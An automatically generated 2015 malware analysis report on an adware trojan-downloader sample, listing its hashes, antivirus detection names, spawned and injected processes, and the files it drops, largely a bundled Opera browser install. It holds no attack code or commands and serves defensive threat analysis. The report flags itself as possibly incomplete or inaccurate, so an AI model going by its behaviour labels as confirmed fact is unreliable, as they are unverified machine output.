Gen.Variant.Adware.Kazy.464669_602eaeccae

by malwarelabrobot on February 24th, 2015 in Malware Descriptions.

Gen:Variant.Adware.Kazy.464669 (B) (Emsisoft), Gen:Variant.Adware.Kazy.464669 (AdAware), mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanDownloaderVundo.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Banker, Trojan, Worm, EmailWorm, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 602eaeccae9a51641f89b53721614b2a
SHA1: e811e94fcd41749bcd7c8950b5e6989ff99ce8aa
SHA256: faff44784402e461573485e000286524e29d3483bf4599351610b374ca075fa9
SSDeep: 12288:8dGLbynBgsVNxenHfd1tHC/OpOFOKwJZS13qgHWyrzx9SqiZ:8d7gINcHhHwVHLvmP
Size: 689032 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-10 00:10:51
Analyzed on: Windows7Ada SP1 64-bit

Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

TPAutoConnSvc.exe:1776
w0jKC6uoKzUY.exe:3152
%original file name%.exe:3852
installer.exe:3804
Df6Dtkv9LPdV.exe:3996
Df6Dtkv9LPdV.exe:1532
opera.exe:3924
opera.exe:2104
opera.exe:3308
opera.exe:3536
opera.exe:3656
opera.exe:3108
opera.exe:2340
opera.exe:2888
opera.exe:3576
opera.exe:4048
opera.exe:4720
opera.exe:1408
opera.exe:4492
opera.exe:1440
opera.exe:1396
opera.exe:2016
opera.exe:2264
opera.exe:568
opera.exe:200
opera.exe:3912
opera.exe:580
opera.exe:3740
opera.exe:1276
opera.exe:4988
opera.exe:3456
opera.exe:3528
opera.exe:972
opera.exe:4732
opera.exe:3464
opera.exe:5080
opera.exe:2516
opera.exe:800
opera.exe:3264
M4qMs9te1cPN.exe:4064
BackgroundSingleton.exe:3248
Uninstaller.exe:1732
cscript.exe:3508
opera_autoupdate.exe:3696
opera_autoupdate.exe:2588
rW6IhvkK2QUK.exe:2172
regsvr32.exe:3184
regsvr32.exe:320
regsvr32.exe:3180
bAQhdcvmXpIk.exe:3192
JUR0CxdplxCY.exe:4040
JUR0CxdplxCY.exe:1936
ExtensionUpdaterService.exe:2632

The Trojan injects its code into the following process(es):

%original file name%.exe:3304
%original file name%.exe:2788
opera.exe:3144
opera.exe:3104
opera.exe:3584
opera.exe:1572
opera.exe:3692
BackgroundSingleton.exe:3692

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process w0jKC6uoKzUY.exe:3152 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\ntuser.dat.LOG1 (3992 bytes)
C:\Users\"%CurrentUserName%"\NTUSER.DAT (4800 bytes)
C:\Users\"%CurrentUserName%"\Desktop\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.ico (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\netF42F.tmp (3172 bytes)

The process %original file name%.exe:3304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\M4qMs9te1cPN.exe (63927 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\rW6IhvkK2QUK.exe (101249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Df6Dtkv9LPdV.exe (47084 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\bAQhdcvmXpIk.exe (208068 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\w0jKC6uoKzUY.exe (63927 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\JUR0CxdplxCY.exe (125396 bytes)

The process installer.exe:3804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\Opera\27.0.1689.69\launcher_lib.dll (3361 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_100_percent.pak (10177 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-140_contrast-white.png (3 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\libGLESv2.dll (8657 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\013E742B-287B-4228-A0B9-BD617E4E02A4.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\4C95ADC1-5FD9-449D-BC75-77CA217403AE.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ru.pak (673 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-180.png (2 bytes)
%Program Files% (x86)\Opera\9175.tmp (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera.lnk (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ro.pak (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113148.log (474034 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\de.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\2F8F0E41-F521-45A4-9691-F664AFAFE67F.ico (17 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_autoupdate.licenses (14 bytes)
%Program Files% (x86)\Opera\installation_status.xml (11 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\sr.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\message_center_win8.dll (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\zh-CN.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_autoupdate.exe (15116 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-80.png (2 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-80.png (1 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-100_contrast-white.png (2 bytes)
%Program Files% (x86)\Opera\launcher.exe (3564 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\win8_importing.dll (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\te.pak (1425 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ca.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\license.txt (17 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\tr.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\pa.pak (1281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_200_percent.pak (15116 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\pl.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\da.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico (17 bytes)
%Program Files% (x86)\Opera\Resources.pri (3 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ja.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\cs.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\msvcp100.dll (2321 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\nn.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera.exe (389498 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\ffmpegsumo.dll (7385 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\nb.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ta.pak (1425 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ms.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\8D754F20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\AD2FD2BD-0727-4AF7-8917-AAED8627ED47.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\0CD5F3A0-8BF6-11E2-9E96-0800200C9A66.ico (17 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_125_percent.pak (8281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Opera.lnk (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\id.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\az.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\3B6191A0-8BF3-11E2-9E96-0800200C9A66.ico (5 bytes)
C:\Users\Public\Desktop\Opera.lnk (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\zu.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\af.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\vi.pak (673 bytes)
%Program Files% (x86)\Opera\server_tracking_data (489 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\pt-BR.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\F98D4D4C-8AA7-4619-A1E7-AC89B24558DD.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\en-US.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\2A3F5C20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\be.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_crashreporter.exe (3361 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\C665D993-1B49-4C2E-962C-BEB19993BB86.ico (17 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-100_contrast-white.png (1 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-140.png (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\hu.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\th.pak (1281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\icudtl.dat (81149 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\pt-PT.pak (601 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-180_contrast-white.png (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\sw.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\6D3582E1-6013-429F-BB34-C75B90CDD1F8.ico (1 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-80_contrast-white.png (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\es.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\lv.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\kk.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\en-GB.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\d3dcompiler_46.dll (22786 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\bn.pak (1425 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\mk.pak (673 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-100.png (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico (34 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\hr.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\B478FE0C-0761-41C3-946F-CD1340356039.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\default_partner_content.json (1281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\nl.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\it.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\ko.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_150_percent.pak (8281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\76C397A8-9E8E-4706-8203-BD2878E9C618.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\es-419.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_autoupdate.version (5 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\sk.pak (601 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-180_contrast-white.png (4 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\fy.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\dictionaries.xml (11 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\1AF2CDD0-8BF3-11E2-9E96-0800200C9A66.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\msvcr100.dll (5441 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-140.png (3 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera.pak (119504 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\libEGL.dll (1281 bytes)
%Program Files% (x86)\Opera\launcher.visualelementsmanifest.xml (318 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\zh-TW.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\installer.exe (7971 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\F3F34CBB-24FF-4830-9E87-1663E7A0A5EE.ico (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\fil.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\1CF37043-6733-479C-9086-7B21A2292DDA.ico (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\FF57F01A-0718-44B7-8A1F-8B15BC33A50B.ico (5 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\uz.pak (673 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\osmesa.dll (22350 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\me.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\wow_helper.exe (601 bytes)
%Program Files% (x86)\Opera\Assets\150x150Logo.scale-180.png (4 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\fr-CA.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\07593226-C5C5-438B-86BE-3F6361CD5B10.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\opera_250_percent.pak (6841 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\5BBBDD5B-EDC7-4168-9F5D-290AF826E716.ico (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\sv.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\hi.pak (1281 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-100.png (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\el.pak (1281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\CFD4BE41-4C6D-496A-ADDB-4095DFA1DD0E.ico (5 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\bg.pak (673 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-80_contrast-white.png (1 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\lt.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\fr.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico (1 bytes)
%Program Files% (x86)\Opera\Assets\70x70Logo.scale-140_contrast-white.png (2 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\fi.pak (601 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\uk.pak (1281 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\localization\gd.pak (673 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\pdf.dll (71155 bytes)
%Program Files% (x86)\Opera\27.0.1689.69\resources\66DD4BB6-A3BA-4B11-AF7A-F4BF23E073B2.ico (15 bytes)

The process Df6Dtkv9LPdV.exe:3996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\installer.exe (49 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139.log (23904 bytes)

The process Df6Dtkv9LPdV.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\Df6Dtkv9LPdV.exe (5261 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico (34 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\F3F34CBB-24FF-4830-9E87-1663E7A0A5EE.ico (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\fi.pak (126 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\uk.pak (207 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\sv.pak (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\66DD4BB6-A3BA-4B11-AF7A-F4BF23E073B2.ico (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\lv.pak (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\license.txt (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\nn.pak (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_200_percent.pak (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\fr.pak (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-180_contrast-white.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\07593226-C5C5-438B-86BE-3F6361CD5B10.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\hi.pak (254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\ffmpegsumo.dll (992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\me.pak (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Resources.pri (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\launcher.exe (487 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\zh-TW.pak (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\win8_importing.dll (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\launcher.visualelementsmanifest.xml (318 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\th.pak (250 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ca.pak (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\2A3F5C20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_150_percent.pak (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\B478FE0C-0761-41C3-946F-CD1340356039.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\dictionaries.xml (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-80.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3BB9C1BA2D19E090AE305B2683903A0_6E9A9670139B949E0946278E14EB2FC8 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\zh-CN.pak (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\be.pak (182 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\6D3582E1-6013-429F-BB34-C75B90CDD1F8.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_autoupdate.version (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\76C397A8-9E8E-4706-8203-BD2878E9C618.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_autoupdate.licenses (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\server_tracking_data (489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\root_files_list (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD (1520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\pa.pak (237 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\4C95ADC1-5FD9-449D-BC75-77CA217403AE.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_250_percent.pak (917 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-140_contrast-white.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\zu.pak (124 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\pl.pak (129 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-140.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\wow_helper.exe (73 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera.exe (65075 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\1AF2CDD0-8BF3-11E2-9E96-0800200C9A66.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-100_contrast-white.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\de.pak (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\pdf.dll (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ko.pak (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\nb.pak (120 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E4F76C0C82655FD6506668127FA0ACD1_F6AB1C86FB0C74897AC7F2CB403CFB96 (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\el.pak (216 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\opera_crashreporter.exe (552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\nl.pak (124 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\ro.pak (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-100.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139.7z (27684 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\libEGL.dll (219 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\mk.pak (193 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\icudtl.dat (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\70x70Logo.scale-180.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\F98D4D4C-8AA7-4619-A1E7-AC89B24558DD.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\013E742B-287B-4228-A0B9-BD617E4E02A4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\Assets\150x150Logo.scale-100_contrast-white.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\d3dcompiler_46.dll (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\tr.pak (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\da.pak (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\fr-CA.pak (129 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\es.pak (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\hr.pak (125 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\uz.pak (191 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139 (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\az.pak (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\5BBBDD5B-EDC7-4168-9F5D-290AF826E716.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\en-US.pak (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\localization\fil.pak (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\AD2FD2BD-0727-4AF7-8917-AAED8627ED47.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Opera Installer\opera_installer_20150223113139\resources\1CF37043-6733-479C-9086-7B21A2292DDA.ico (2 bytes)
